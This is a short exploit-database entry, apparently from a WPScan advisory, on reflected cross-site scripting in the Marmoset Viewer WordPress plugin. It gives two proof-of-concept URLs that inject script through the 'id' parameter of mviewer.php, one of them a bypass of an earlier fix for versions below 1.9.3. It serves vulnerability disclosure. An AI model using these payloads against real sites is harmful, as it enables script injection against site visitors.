## https://sploitus.com/exploit?id=WPEX-ID:D11B79A3-F762-49AB-B7C8-3174624D7638
https://example.com/wp-content/plugins/marmoset-viewer/mviewer.php?id=http://%3C/script%3E%3Csvg/onload=alert(1)%3E

(WPScanTeam) The reporter mentioned the issue was fixed in 1.9.2, but there was a bypass.

v < 1.9.3
https://example.com/wp-content/plugins/marmoset-viewer/mviewer.php?id=1+http://a.com%27);alert(/XSS/);marmoset.embed(%27a